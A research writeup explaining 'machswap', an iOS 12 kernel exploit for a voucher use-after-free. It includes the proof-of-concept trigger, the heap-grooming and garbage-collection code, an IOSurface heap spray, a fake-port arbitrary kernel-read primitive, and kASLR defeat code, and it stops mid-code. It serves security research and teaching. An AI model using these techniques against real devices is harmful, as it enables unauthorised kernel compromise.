MachSwap: an iOS 12 Kernel Exploit
Back at the end of January I demo’d an early iOS 12 prototype jailbreak, which included a homebrewed kernel exploit, root FS remount, and nonce setter. I achieved this in a little under two days with help from my good friends @S1guza, @littlelailo, and @stek29, making it one of the first iOS 12 prototype jailbreaks, before any public kernel exploits were released (subtle flex). About a month later I tidied up the source code and released the inital non-SMAP exploit under the name machswap (I later released an SMAP-compatible version, machswap2, which can also be found on my GitHub). I wanted to create a writeup detailing the bug and how the exploit works, in order to inspire and help others which are interested in iOS security research.
Looking at a modern iOS exploit
On the 23rd of January 2019, security researcher @S0rryMybad released a proof of concept exploit for a kernel bug affecting iOS 12.1.2 and below. A little over five and a half hours later he followed it up with a Chinese blog post describing the bug and possible exploitation techniques, and later an English version.
The bug is a user-after-free vulnerability which can be triggered from a sandboxed process on iOS, such as an app. It stems from a reference counting issue due to a poor implementation of a function within the kernel.
Before explaining the details of the bug, it’s important to understand a little about MIG, and the Mach subsystem in XNU (XNU is the kernel used on iOS, macOS, etc, devices).
0x01 Mach, MIG, and UAF’s
Mach is an IPC or “Inter-Process Communication” layer, which allows processes on a system to talk to one-another. This includes the kernel, as well as other system services and daemons which are responsible for handing specific tasks (for example, the userland daemon bluetoothd implements a Mach server, which can be accessed to set-up and manage bluetooth connections). It’s a postbox-like system which involves sending letters (Mach messages) between postboxes (Mach ports). Different postboxes (Mach ports) have different “rights”, for example you may only be able to send mail from some postboxes (a send right) whilst only being able to receive mail in others (a receive right). All postboxes have a specific address, in XNU this is known as a “handle”.
While it can be done, writing raw Mach code is a very tedious and time consuming process, and it’s easy to make mistakes which can potentially cause issues or create vulnerabilities within Mach server processes.
Therefore, Apple created a tool called MIG (“Mach Interface Generator”). It allows far quicker development of Mach interfaces, and is used all over iOS to design and handle Mach communication between both services and the kernel. When using MIG to generate Mach code, you can write definitions for functions you want to be able to access over the Mach API. “jailbreakd”, used in the Meridian and Electra jailbreaks, is one such example of a Mach server using MIG-generated code, and you can see the template used to generate the “jbd_call” function which jailbreakd implements here:
// mig -sheader jailbreak_daemonServer.h -header jailbreak_daemonUser.h mig.defs
subsystem jailbreak_daemon 500;
userprefix jbd_;
serverprefix jbd_;
WaitTime 2500;
#include <mach/std_types.defs>
#include <mach/mach_types.defs>
routine call(server_port : mach_port_t;
in command : uint8_t;
in pid : uint32_t);
This will expose a “jbd_call” function implemented within jailbreakd, which can then be accessed from any clients that wish to communicate with it. In this 3 arguments are provided to the server; the Mach port of the request, a byte which represents the command, and an unsigned 32-bit integer which represents the PID (Process ID) of the target process for jailbreakd to operate on.
MIG simply allows you to define this function, and will handle all of the raw Mach heavy lifting. This includes managing messages, reply ports, timeouts, and the lifetime or refcounts (reference counts) of objects. A “refcount” is simply a counter of how many places the object is being accessed or used from. Once an object reaches a reference count of zero, the object can be released, as there is no longer any code on the system using the object.
But is this always the case? A bug which allows an attacker to decrement the reference count more than intended often means the object can be released when it’s still being used by code; leading to a use-after-free (UAF) condition. This is often referred to as “dropping a ref”. “Releasing” in this case means the memory which the object is held in is “released” back to the allocator (a mechanism which manages memory allocations, in userland this is “malloc”, in kernel this is often “kalloc”) – this is also known as “freeing” the memory (hence the term use-after-free). This means the memory can then be re-allocated and used by other code for other purposes. However, if a piece of memory used by function “A” is released and then used by function “B”, this has the potential to cause interference to the workings of function “A”. It’s important to note that the object or memory allocation which has been UAF’d doesn’t have to be continuously used by a single function, the important thing is that the code using the released object still views it as “valid” and think it’s being used exclusively by that code, even if this is not the case as far as the allocator is concerned (ie; the allocator has released that memory and has now allocated it elsewhere).
From a more abstract standpoint, many bugs are based on the idea of mismatching states between two or more pieces of code or mechanisms. For example, with an integer overflow, you might want to mismatch the acutal size of an allocation with how large the code thinks the allocation is. If you consider the kernel as an incredibly large state machine, we’re effectively placing it into an unintended state where some code is using an allocation of memory whilst some other code (the allocator) is allowing that same memory to be re-used by other attacker-influenced code. It’s like walking up to a parking meter and pressing ↑↑↓↓←→←→BA in order to put the machine in a weird state and get a free parking ticket.
0x02 The Vuln
This leads us on to the vulnerability used in this kernel exploit. Let’s take a look at the following function:
task_swap_mach_voucher(
task_t task,
ipc_voucher_t new_voucher,
ipc_voucher_t *in_out_old_voucher)
{
if (TASK_NULL == task)
return KERN_INVALID_TASK;
*in_out_old_voucher = new_voucher;
return KERN_SUCCESS;
}
Looks fairly simple, right? It simply swaps a voucher in a pointer with a new voucher. This function can be accessed from userland (ie. an iOS app) via the Mach API, and the call between kernel and userland is handled by MIG. However, let’s take a look at that MIG code:
task = convert_port_to_task(In0P->Head.msgh_request_port);
/* increments by one */
new_voucher = convert_port_to_voucher(In0P->new_voucher.name);
/* increments by one */
old_voucher = convert_port_to_voucher(In0P->old_voucher.name);
RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
ipc_voucher_release(new_voucher); /* decrements by one */
task_deallocate(task);
if (RetCode != KERN_SUCCESS) {
MIG_RETURN_ERROR(OutP, RetCode);
}
if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);
if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
/* decrements by one */
OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
To generate this code, you can download the corresponding .defs file for the function from the XNU sources, and run the command mig -DKERNEL -DKERNEL_SERVER mig.defs
At first glance, this code looks fine. Each voucher object has its refcount incremented by one, and then decremented by one. However, because of the MIG code having no understanding of what the kernel code (task_swap_mach_voucher
) itself is doing, and vice-versa, this leads to an issue. After task_swap_mach_voucher
is called, old_voucher
and new_voucher
will be equal (remember, task_swap_mach_voucher
assigns new_voucher
into old_voucher
). Therefore, the refcount on new_voucher
will be incremented once, and then decremented twice by both ipc_voucher_release
, and convert_voucher_to_port
(again, old_voucher
is now equal to new_voucher
). The refcount on old_voucher
itself will also not be decremented at all. This leads us to the following proof of concept (PoC):
mach_voucher_attr_recipe_data_t atm_data =
{
.key = MACH_VOUCHER_ATTR_KEY_ATM,
.command = 510
};
mach_port_t p1;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
mach_port_t p2;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p2);
mach_port_t p3;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p3);
/*
We assign p1 (our target voucher) onto our thread so it can be accessed again later.
When we later try to retreive it
This will increment a ref on the voucher -- the current refcount is 2
*/
ret = thread_set_mach_voucher(mach_thread_self(), p1);
ret = task_swap_mach_voucher(mach_task_self(), p1, &p2); // Trigger the bug once, this drops a ref from 2 to 1
ret = task_swap_mach_voucher(mach_task_self(), p1, &p3); // Second trigger, this frees the voucher (refcnt=0)
/* Ask for a handle on the danging voucher, 9 times out of 10 this will cause a panic due to the bad refcnt etc */
mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);
Here we trigger the bug twice via the task_swap_mach_voucher
call to drop two refs on the target voucher. This then leaves us with a pointer on our thread to a free’d voucher in kernel memory.
0x03 Beginning our Exploitation
Once the voucher has been free’d we can then replace this with attacker-controlled data via a technique called “heap spraying”. The idea is to fill or “spray” the kernel heap (a place in a program in which allocations managed by the allocator are created and destroyed) to overwrite the now-free’d voucher with our own data. If this is done successfully, we would then have the voucher pointer in our thread pointing to our arbitrary voucher struct, and we could use the thread_get_mach_voucher
function to get a userland handle on that voucher, which can then be passed to Mach API’s to gain new attack primitives.
The ipc_voucher
struct is defined as follows:
struct ipc_voucher {
iv_index_t iv_hash; /* checksum hash */
iv_index_t iv_sum; /* checksum of values */
os_refcnt_t iv_refs; /* reference count */
iv_index_t iv_table_size; /* size of the voucher table */
iv_index_t iv_inline_table[IV_ENTRIES_INLINE];
iv_entry_t iv_table; /* table of voucher attr entries */
ipc_port_t iv_port; /* port representing the voucher */
queue_chain_t iv_hash_link; /* link on hash chain */
};
We can see the iv_refs
field which contains the reference count which we dropped, and importantly, a pointer to an ipc_port_t
in iv_port
. This ipc_port_t
struct is the kernel representation of a generic Mach port. In this case, the ipc_voucher
implements the ipc_port_t
as a field whilst implementing some of its own attributes (for example, iv_table
and iv_inline_table
).
One important thing to note about the voucher port is that it doesn’t have a receive right. In Mach, ports can have send and receive rights. If the port has a send right you can send messages on that port, and if the port has a receive right you can receive messages on that port. Since we have no receive right here, this means the exploit strays slightly from the de-facto exploitation (ie. v0rtex). However, the same results can still be achieved by using slightly different primitives – this will come into play later.
When we perform our heap spray we want to spray these ipc_voucher
structs onto the kernel heap and replace the free’d voucher struct with an arbitrary one. The main goal is to gain control of the iv_port
field, and point that into an attacker controlled ipc_port
. This is the basis of how many Mach API-based exploitation techniques work: get a userland handle onto an attacker-controlled ipc_port
which is “theoretically” owned and managed by the kernel.
This is where the “non-SMAP” element of this exploit comes into play. Typically, on SMAP devices (A10 and newer), the kernel is unable to access memory in userland. SMAP (Supervisor Mode Access Prevention) is implemented to stop attackers providing userland allocations when attacking the kernel which can directly be modified in userland without any special tricks. However, on non-SMAP devices (<=A9), we are still able to abuse this technique when performing exploitation (SMAP has to be implemented in hardware, and therefore can’t be backported to older firmwares via updates).
In this case, we can spray an ipc_voucher
struct, where the iv_port
field contains a pointer to an ipc_port
allocated in userland. This means the kernel will use our ipc_port
as if it had been created and allocated in kernelspace, when in fact it has been allocated in userland and can be manipulated and updated by us directly. Here is the code in the exploit which sets up this voucher:
kport_t *fakeport = malloc(0x4000);
mlock((void *)fakeport, 0x4000);
bzero((void *)fakeport, 0x4000);
fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;
fakeport->ip_references = 100;
fakeport->ip_lock.type = 0x11;
fakeport->ip_messages.port.receiver_name = 1;
fakeport->ip_messages.port.msgcount = 0;
fakeport->ip_messages.port.qlimit = MACH_PORT_QLIMIT_LARGE;
fakeport->ip_messages.port.waitq.flags = mach_port_waitq_flags();
fakeport->ip_srights = 99;
LOG("fakeport: 0x%llx", (uint64_t)fakeport);
/* the fake voucher to be sprayed */
fake_ipc_voucher_t fake_voucher = (fake_ipc_voucher_t)
{
.iv_hash = 0x11111111,
.iv_sum = 0x22222222,
.iv_refs = 100,
.iv_port = (uint64_t)fakeport
};
You can see we create a fake ipc_voucher
which contains 100 refs (this is so the object will never prematurely be destroyed), and the iv_port
field contains a pointer directly to our userland fakeport
object.
Now we need to spray this object into kernel memory. However; there is a slight problem, and that is related to the “kalloc” allocator and “kalloc zones”.
0x04 Borachio and the Climate Control Team (Abusing GC)
Kalloc, the XNU allocator which is used to allocate our ipc_voucher struct which we have UAF’d, uses a series of “zones” to allocate objects into. These are sections of heap memory which only contain a specific size or type of object. For example, the kalloc.32 zone contains objects which are <=32 bytes in size (however >16 bytes, as this is the next smallest zone). You can take a look at some of these zones by using the “zprint” command on an OSX or iOS system:
$ sudo zprint | awk 'NR<=3 || /kalloc|ipc.ports/'
elem cur max cur max cur alloc alloc
zone name size size size #elts #elts inuse size count
-------------------------------------------------------------------------------------------------------------
kalloc.16 16 12592K 13301K 805888 851264 802478 4K 256 C
kalloc.32 32 3652K 3941K 116864 126113 113244 4K 128 C
kalloc.48 48 5952K 8867K 126976 189169 121315 4K 85 C
kalloc.64 64 9212K 13301K 147392 212816 145701 4K 64 C
kalloc.80 80 2988K 3941K 38246 50445 37847 4K 51 C
kalloc.96 96 1496K 1556K 15957 16607 15011 8K 85 C
kalloc.128 128 5400K 5911K 43200 47292 41427 4K 32 C
kalloc.160 160 1432K 1556K 9164 9964 7958 8K 51 C
kalloc.192 192 876K 1037K 4672 5535 4520 12K 64 C
kalloc.224 224 9488K 10509K 43373 48043 36239 16K 73 C
kalloc.256 256 2912K 3941K 11648 15764 10799 4K 16 C
kalloc.288 288 3260K 3892K 11591 13839 10416 20K 71 C
kalloc.368 368 3488K 4151K 9705 11553 8810 32K 89 C
kalloc.400 400 2640K 3892K 6758 9964 5665 20K 51 C
kalloc.512 512 3636K 3941K 7272 7882 6848 4K 8 C
kalloc.576 576 212K 345K 376 615 290 4K 7 C
kalloc.768 768 2676K 3503K 3568 4670 3009 12K 16 C
kalloc.1024 1024 3716K 5911K 3716 5911 3503 4K 4 C
kalloc.1152 1152 320K 461K 284 410 200 8K 7 C
kalloc.1280 1280 1040K 1153K 832 922 723 20K 16 C
kalloc.1664 1664 700K 717K 430 441 399 28K 17 C
kalloc.2048 2048 932K 1167K 466 583 456 4K 2 C
kalloc.4096 4096 4816K 13301K 1204 3325 1140 4K 1 C
kalloc.6144 6144 16704K 26602K 2784 4433 2628 12K 2 C
kalloc.8192 8192 1536K 5254K 192 656 187 8K 1 C
ipc.ports 168 5580K 18660K 34011 113737 33156 12K 73 C
The appended awk
command will print the first 3 lines of the zprint output (the table header), as well as any lines which contain ‘kalloc’ or ‘ipc.ports’
Note: the output will vary slightly between an iOS and OSX system. For example, there are some differences in the kalloc zones. This output was dumped from an OSX system.
In this list we can see all of the kalloc zones, as well as a special zone called ‘ipc.ports’. This is a zone which any ipc ports are allocated into – including our ipc_voucher. There are no primitives which allow spraying arbitrary data into the ipc.ports zone, so in order to spray the page containing our free’d port we first need to release the page in the ipc.ports zone back to the allocator, and then re’alloc it into a kalloc zone (which can be sprayed into). This can be done via the GC (Garbage Collect) mechanism. Triggering GC will release any unused pages back to the allocator.
On iOS 10 and older, this mechanism could be triggered via Mach call to the kernel. However, in iOS 11, this functionality was removed, so attackers must now trigger it manually via many methods. In Siguza’s v0rtex writeup, he described one method of doing so:
[…] you should still be able to trigger a garbage collection by iterating over all zones, allocating and subsequently freeing something like 100MB in each, and measuring how long it takes to do so - garbage collection should be a significant spike
Hence the following function. Here we allocate a message which will be sent into the kalloc.16384 zone, and send it (via the send_kalloc_message
function) 256 times, recording the amount of time it takes for each. If sending these messages takes longer than 1,000,000 nanoseconds (1 millisecond), we can assume GC has been triggered.
void trigger_gc_please()
{
[...]
uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
uint8_t *body = malloc(body_size);
memset(body, 0x41, body_size);
for (int i = 0; i < gc_ports_cnt; i++)
{
uint64_t t0, t1;
t0 = mach_absolute_time();
gc_ports[i] = send_kalloc_message(body, body_size);
t1 = mach_absolute_time();
if (t1 - t0 > 1000000)
{
LOG("got gc at %d -- breaking", i);
gc_ports_max = i;
break;
}
}
[...]
sched_yield();
sleep(1);
}
Whilst machswap is a particularly fast exploit – this is the slowest part due to its importance. If triggering GC fails, the page will not be released, and our heap spray will fail, hence causing the entire exploit to fail. Since GC works asynchronously (at the same time as other code), we need to wait some time to ensure GC has completed. Hence the inclusion of the sched_yield
and sleep
calls in the epilogue of this function.
An important factor of GC that must be taken into consideration is that all objects on a given page must be released before the page itself can be released. This means there cannot be a single allocation existing on the same page as our target UAF voucher. To combat this, 0x2000 ports are allocated before our target “p1”, and a further 0x1000 after. See the following code:
/* allocate 0x2000 vouchers to alloc some new fresh pages */
for (int i = 0; i < 0x2000; i++)
{
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &before[i]);
}
/* alloc our target uaf voucher */
mach_port_t p1;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);
/* allocate 0x1000 more vouchers */
for (int i = 0; i < 0x1000; i++)
{
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &after[i]);
}
/*
theoretically, we should now have 3 blocks of memory (roughly) as so:
|--------------------|-------------|------------------|
| ipc ports | target port | more ipc ports |
|--------------------|-------------|------------------|
^ ^
page with only our controlled ports
hopefully our target port is now allocated on a page which contains only our
controlled ports. this means when we release all of our ports *all* allocations
on the given page will be released, and when we trigger GC the page will be released
back from the ipc_ports zone to be re-used by kalloc
this allows us to spray our fake vouchers via IOSurface in other kalloc zones
(ie. kalloc.1024), and the dangling pointer of the voucher will then overlap with one
of our allocations
*/
After triggering the UAF bug and releasing the target port, we can then release all of our controlled ports and then continue in attempting to trigger GC.
0x05 A Heap Spray for your Sprog
Assuming all has gone to plan, by this point GC will have been triggered, and our page released back to the allocation pool. We can then continue with our heap spray in order to send our fake voucher into kernel and replace the free’d voucher. For this we can make use of an IOKit UserClient implemented in the “IOSurface” kext (kernel extension). IOKit is a kernel interface for handing drivers and extensions, and a user client is an object while allows a user to issue commands to a kernel extension. IOSurface is a kext designed for handling and performing calculations on graphical buffers, however it also provides a great heap spraying primitive for us, for two reasons. Firstly, IOSurface (specifically the “set value” method) allows us to provide an encoded plist (property list) containing objects such as array’s (OSArray), dictionaries (OSDictionary), strings (OSStrings), etc. Within these objects we can place completely arbitrary data (including nesting types, ie. a dictionary inside of an array). Secondly, the IOSurface userclient is accessible from the app sandbox, as there are no entitlement or permission checks, or blocks from the sandbox. To spray our data, we can create a surface consisting of OSString’s to spray our data. We set up a single Surface, and then use an array containing a single dictionary, where each entry contains one of the OSString’s we want to spray. An OSString can be any size, however we want to fill entire pages of memory with our data. On 4k devices, the pagesize is 0x1000 (4096), and on 16k devices, 0x4000 (16,384). Due to the “string” part of OSString, our data must be terminated with a NULL byte, so we need to account for this in our size calculations. The code below sets up the data which will be set onto the surface (and hence sprayed into kernel memory), with the bcopy loop then filling each of our OSString’s with our fake ipc_vouchers.
#define FILL_MEMSIZE 0x4000000
int spray_qty = FILL_MEMSIZE / pagesize; // # of pages to spray
int spray_size = (5 * sizeof(uint32_t)) + (spray_qty * ((4 * sizeof(uint32_t)) + pagesize));
uint32_t *spray_data = malloc(spray_size); // header + (spray_qty * (item_header + pgsize))
bzero((void *)spray_data, spray_size);
uint32_t *spray_cur = spray_data;
/*
+-> Surface
+-> Array
+-> Dictionary
+-> OSString
+-> OSString
+-> OSString
etc (spray_qty times)...
*/
*(spray_cur++) = surface->id;
*(spray_cur++) = 0x0;
*(spray_cur++) = kOSSerializeMagic;
*(spray_cur++) = kOSSerializeEndCollection | kOSSerializeArray | 1;
*(spray_cur++) = kOSSerializeEndCollection | kOSSerializeDictionary | spray_qty;
for (int i = 0; i < spray_qty; i++)
{
*(spray_cur++) = kOSSerializeSymbol | 5;
*(spray_cur++) = transpose(i);
*(spray_cur++) = 0x0;
*(spray_cur++) = (i + 1 >= spray_qty ? kOSSerializeEndCollection : 0) | kOSSerializeString | (pagesize - 1);
for (uintptr_t ptr = (uintptr_t)spray_cur, end = ptr + pagesize;
ptr + sizeof(fake_ipc_voucher_t) <= end;
ptr += sizeof(fake_ipc_voucher_t))
{
bcopy((const void *)&fake_voucher, (void *)ptr, sizeof(fake_ipc_voucher_t));
}
spray_cur += (pagesize / sizeof(uint32_t));
}
We can then make a call to the userclient to set the provided data onto the Surface:
uint32_t dummy = 0;
size = sizeof(dummy);
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, spray_data, spray_size, &dummy, &size);
if(ret != KERN_SUCCESS)
{
LOG("setValue(prep): %s", mach_error_string(ret));
goto out;
}
If this has worked correctly, our free’d ipc_voucher will have now been replaced with our fake voucher which we have copied onto kernel memory via our heap spray. This means the port stashed on our thread will now point to our fake ipc_voucher
, which points to our fake ipc_port
, which is allocated in userland as fakeport
. We now attempt to get a handle onto this voucher/port, via the thread_get_mach_voucher
call:
mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
/* fingers crossed we get a userland handle onto our 'fakeport' object */
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);
LOG("port: %x", real_port_to_fake_voucher);
/* things are looking good; should be 100% success rate from here */
LOG("WE REALLY POSTED UP ON THIS BLOCK");
mach_port_t the_one = real_port_to_fake_voucher;
From here, things are looking good. Assuming our port is infact valid, we should have a 100% success rate from this point – the dangerous parts are now over.
0x06 Eavesdropping Kernel Memory: Building a Read Primitive
We can now start to build our first read primitive which we can use to read important pointers in the kernel’s memory – these are later used in setting up our fake kernel task struct.
Typically, I would recommend setting up a read primitive via the mach_port_get_attributes
Mach call, as demonstrated in the v0rtex exploit. This call implements proper locking on the port, However, due to the aformentioned lack of receive right, this is not possible. Instead, we will use an older but more common technique with regard to Mach-based exploitation; the pid_for_task
primitive. The Mach API implements a function called “pid_for_task”, which will return the pid of a process of whom’s task port you provide. Here is the (heavily stripped) kernel code:
pid_for_task(
struct pid_for_task_args *args)
{
mach_port_name_t t = args->t;
user_addr_t pid_addr = args->pid;
[...]
t1 = port_name_to_task_inspect(t);
[...]
p = get_bsdtask_info(t1); /* Get the bsd_info entry from the task */
if (p) {
pid = proc_pid(p); /* Returns p->p_pid */
err = KERN_SUCCESS;
} [...]
(void) copyout((char *) &pid, pid_addr, sizeof(int));
return(err);
}
You can see get_bsdtask_info
is called on the task port we provide, and then the resulting pid from proc_pid
is copied back to userland. The important thing here is that no checks are performed on the validity of the provided task port nor the proc which is returned from get_bsdtask_info
(even so, such checks would be futile against this primitive). Let’s look at get_bsdtask_info
and proc_pid
:
void *get_bsdtask_info(task_t t)
{
/* ldr x0, [x0, #0x358]; ret */
return(t->bsd_info);
}
int
proc_pid(proc_t p)
{
if (p != NULL)
/* ldr w0, [x0, #0x60]; ret */
return (p->p_pid);
return -1;
}
In essence, via this call, we can retrieve the value of task->bsd_info->p_pid
. Since we have control over the task
struct (this is a field within our fakeport), we have full control of the address which bsd_info
points to. Therefore, by manipulating the bsd_info
pointer, we can get a 32-bit read (as p_pid is a 32-bit int, and the value is loaded into the ‘w’ register) of any kernel address we require. If we need to read a 64-bit value, we can use two adjacent 32-bit reads and later combine the values to calculate the original value.
We first allocate a fake task object which resides in the ip_kobject
field of our fakeport. We also set the ip_bits
field of our fakeport to IO_BITS_ACTIVE | IKOT_TASK
– this marks our ipc_port as a port which represents a task, allowing us to use calls such as pid_for_task
on it.
ktask_t *fake_task = (ktask_t *)malloc(0x600); // task is about 0x568 or some shit
bzero((void *)fake_task, 0x600);
fake_task->ref_count = 0xff;
uint64_t *read_addr_ptr = (uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_bsd_info);
fakeport->ip_kobject = (uint64_t)fake_task;
The read_addr_ptr points to our bsd_info pointer which we can overwrite with arbitrary kernel addresses. We then implement our 32bit read primitive as so:
#define rk32(addr, value)\
*read_addr_ptr = addr - offsets->struct_offsets.proc_pid;\
value = 0x0;\
ret = pid_for_task(the_one, (int *)&value);
Note the addr - offsets->struct_offsets.proc_pid
. This is because when the p_pid
field is accessed within the bsd_info
struct, it will add the offset of struct_offsets.proc_pid
to the bsd_info
pointer before performing the read. We therefore subtract this value to account for this and read the correct data.
As previosuly noted, we can combine adjacent 32bit values for a full 64bit read:
#define rk64(addr, value)\
rk32(addr + 0x4, read64_tmp);\ /* Read the higher */
rk32(addr, value);\ /* Read the lower */
value = value | ((uint64_t)read64_tmp << 32) /* Shift the higher by 32bits to the left and OR against the lower bits */
We now have a working read primitive based on our fakeport and newly-allocated fake task struct.
0x07 Defeating kASLR
ASLR (Address Space Layout Randomization) is a mitigation used to make exploitation of software harder by shifting all the static data within a program’s address space by a constant but randomized value (hence the “random” element). In the kernel, this is used to shift all of the static regions (__TEXT, __DATA.__const, etc) from a static base value to a higher, random memory location. It’s important to derive this value (known as the kernel “slide”) as it is commonly used by jailbreaks in order to read and write data from static offsets, and call functions in kernel __TEXT
.
The first thought that may come to mind when learning about kASLR is simply “can it be brute forced”? In the typical sense of simply trying to read from every possible base address until you get some data, the answer is no. This is due to the fact that the kernel slide can vary by a huge amount, and when attempting to read from every address you would likely hit an unmapped region. If the kernel tries to read from an unmapped region a fault is triggered ending in a panic. This would hugely decrease the success rate of the exploit, as you would be relying on a near perfect guess of where the kernel image is located in memory. Here is the code used to derive the kernel base address, courtesy of the iPhoneWiki:
base = 0x01000000 + (slide_byte * 0x00200000)
The slide_byte
spans values 0 through 255, however in the case of 0 a base
of 0x21000000 is used, so in this case we can use the model that the slide_byte
is actually values 1 through 256. This means that the lowest base
is 0x01200000, and the highest is 0x21000000. Subtracting these we get the value 0x1fe00000, which is a whopping 530+mb of data! Taking this into account, it is clear that brute forcing by simply trying every possible address would more than likely hit unmapped memory.
However, there is a trick you can use to guarantee that you won’t hit unmapped memory. Take a look at this output from jtool
:
$ jtool -l ~/Desktop/kernels/84-1211 | grep LC_SEGMENT_64
LC 00: LC_SEGMENT_64 Mem: 0xfffffff007004000-0xfffffff007078000 __TEXT
LC 01: LC_SEGMENT_64 Mem: 0xfffffff007078000-0xfffffff007098000 __DATA_CONST
LC 02: LC_SEGMENT_64 Mem: 0xfffffff007098000-0xfffffff0075c8000 __TEXT_EXEC
LC 03: LC_SEGMENT_64 Mem: 0xfffffff0075c8000-0xfffffff0075cc000 __LAST
LC 04: LC_SEGMENT_64 Mem: 0xfffffff0075cc000-0xfffffff0075d0000 __KLD
LC 05: LC_SEGMENT_64 Mem: 0xfffffff0075d0000-0xfffffff007678000 __DATA
LC 06: LC_SEGMENT_64 Mem: 0xfffffff007678000-0xfffffff007690000 __BOOTDATA
LC 07: LC_SEGMENT_64 Mem: 0xfffffff005ca4000-0xfffffff006138000 __PRELINK_TEXT
LC 08: LC_SEGMENT_64 Mem: 0xfffffff0077e8000-0xfffffff0079e0000 __PRELINK_INFO
[...]
Up until the beginning of PRELINK_TEXT, all regions (including __TEXT) are mapped completely continuously (right as one segment ends, another one starts) at the base of the kernel virtual address space (VAS). Therefore, if we are able to find a pointer into __TEXT (ie, the address of a function), we can then derive the base of the kernel via brute force as we are guaranteed not to hit any unmapped memory! The only question is, how do we get such a pointer?
In C++, every object contains something called a vtable. The vtable is an array of “virtual” methods (methods which the object implements). The vtable is located at offset 0x0 within the object, and is simply a list of function pointers. If we can find a C++ object (and therefore its vtable), we can get our function pointer, and derive the kernel slide.
Since we have a read primitive set up, and an attacker-controlled port, we can traverse kernel memory to find such a C++ object.
One example is the IOSurfaceUserClient object, which we created earlier when we set up our heap spray. We can register the port we opened to the client via the mach_ports_register
API, which sets a pointer to the port to a field within our task
struct: itk_registered
.
kern_return_t
mach_ports_register(
task_t task,
mach_port_array_t memory,
mach_msg_type_number_t portsCnt)
{
[...]
for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
ipc_port_t old;
old = task->itk_registered[i];
task->itk_registered[i] = ports[i];
ports[i] = old;
}
[...]
return KERN_SUCCESS;
}
So from our task struct, we can read the itk_registered
offset to find the IOSurface ipc_port, then to the ip_kobject
field to find the C++ object itself, then dereference at offset 0x0 to find the vtable, and then dereference any of the vtable methods to find our __TEXT
pointer. However, we first need to find our task struct. For this, we can look at itk_space
. This is an address space which holds mach port rights owned by a task, mapping the uint32_t
port handles to kernel-side ipc_port_t
’s. If we can find a message sent to a port owned by our process, we can find the itk_space
pointer and therefore traverse kernel memory to find the address of a port we allocate within our task, and from there our own task struct (ipc_space->is_task
).
Luckily, our fakeport is owned by our process, we have a userland handle on it of which we can send a message to, and we can then read the ip_messages
struct within our fakeport to find the kernel representation of the Mach message which was sent. This is similar to a technique which I have used in the past in order to get a buffer of data into kernelspace, except this time it is used for ports instead of data.
static kern_return_t send_port(mach_port_t rcv, mach_port_t myP)
{
typedef struct {
mach_msg_header_t Head;
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t task_port;
} Request;
[...]
InP->msgh_body.msgh_descriptor_count = 1;
InP->task_port.name = myP;
InP->task_port.disposition = MACH_MSG_TYPE_COPY_SEND;
InP->task_port.type = MACH_MSG_PORT_DESCRIPTOR;
err = mach_msg(&InP->Head, MACH_SEND_MSG | MACH_SEND_TIMEOUT, InP->Head.msgh_size, 0, 0, 5, 0);
[...]
}
Here we set up a message containing a mach port descriptor, and put our port handle into the OOL (out of line) port descriptor. We then call send_port
using our fakeport as the rcv
argument, and a newly allocated port with both receive and send rights as our myP
argument.
Once the Mach message has been sent, it will be present within fakeport->ip_messages.port.messages
. We can then traverse from this message to find the pointer to our task as so:
ret = send_port(the_one, gangport);
uint64_t ikmq_base = fakeport->ip_messages.port.messages;
uint64_t ikm_header = 0x0;
rk64(ikmq_base + 0x18, ikm_header); /* ipc_kmsg->ikm_header */
uint64_t port_addr = 0x0;
rk64(ikm_header + 0x24, port_addr); /* 0x24 is mach_msg_header_t + body + offset of our port into mach_port_descriptor_t */
uint64_t itk_space = 0x0;
rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);
uint64_t ourtask = 0x0;
rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
Since we now have a pointer to our task struct, we can now use the mach_ports_register
trick to register the IOSurface UserClient, and perform a few more reads to find the vtable entry:
ret = mach_ports_register(mach_task_self(), &client, 1);
uint64_t iosruc_port = 0x0;
rk64(ourtask + offsets->struct_offsets.task_itk_registered, iosruc_port);
uint64_t iosruc_addr = 0x0;
rk64(iosruc_port + offsetof(kport_t, ip_kobject), iosruc_addr);
uint64_t iosruc_vtab = 0x0;
rk64(iosruc_addr + 0x0, iosruc_vtab);
uint64_t get_trap_for_index_addr = 0x0;
rk64(iosruc_vtab + (offsets->iosurface.get_external_trap_for_index * 0x8), get_trap_for_index_addr);
get_trap_for_index_addr
is the address of the IOSurfaceRootUserClient::getExternalTrapForIndex
function, which resides in kernel’s __TEXT
region. We can then walk backwards until we reach the magic value at the kernel header (MH_MAGIC_64
).
#define KERNEL_HEADER_OFFSET 0x4000
#define KERNEL_SLIDE_STEP 0x100000
uint64_t kernel_base = (get_trap_for_index_addr & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
do
{
uint32_t kbase_value = 0x0;
